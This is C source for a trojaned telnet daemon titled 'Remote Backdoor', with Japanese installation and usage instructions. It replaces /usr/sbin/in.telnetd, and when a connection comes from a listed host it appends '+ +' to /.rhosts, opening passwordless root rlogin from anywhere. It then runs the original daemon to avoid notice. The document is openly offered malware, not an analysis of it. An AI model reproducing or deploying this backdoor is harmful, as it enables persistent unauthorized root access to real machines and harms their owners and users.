/*========================================================= Remote Backdoor Programmed by UNYUN [仕込み方] 1) /*1*/にBackdoor作成許可ホスト名を入力 2) rootになる 3) mv /usr/sbin/in.telnetd /usr/sbin/sysmon (sysmonは/*2*/で変更可) 4) cc in.telnetd.c -o in.telnetd 5) mv in.telnetd /usr/sbin [使い方] 1) Targetにtelnetで繋ぐ.繋がったらログイン前に切る 2) rlogin target.co.jp -l root でrootログインする ========================================================= */ #include #include #include #include #include #include #include static char *roothosts[]={"yoursite.ne.jp", /* 1 */ "fumidai.ac.jp", ""}; #define ORIGINAL "/usr/sbin/sysmon" /* 2 */ #define RQ_DAEMON 2 #define BUFFER_SIZE 512 #define RHOSTS "/.rhosts" main(int argc,char *argv[]) { struct sockaddr_in client; struct in_addr clientIn; struct hostent *h; char buf[BUFSIZ],ClientDomain[200]; int len,i,flag; long inetip; FILE *fp; len = sizeof(client); if (getpeername(RQ_DAEMON, (struct sockaddr *)&client, &len) < 0) { len = sizeof(client); if (recvfrom(RQ_DAEMON,buf,sizeof(buf),MSG_PEEK, (struct sockaddr *) & client, &len) < 0) { return; } } memcpy(&clientIn,&client.sin_addr.s_addr,4); inetip=inet_addr(inet_ntoa(clientIn)); h=(struct hostent *)gethostbyaddr(&inetip,sizeof(struct hostent),AF_INET); if (h!=NULL){ for (flag=0,i=0;i<10;i++){ if (strlen(roothosts[i])==0) break; if (strstr(roothosts[i],h->h_name)!=NULL || strstr(h->h_name,roothosts[i])!=NULL){ flag=1; break; } } if (flag==1){ if ((fp=fopen(RHOSTS,"a"))!=NULL){ fprintf(fp,"+ +\n"); fclose(fp); } } } execv(ORIGINAL,argv); }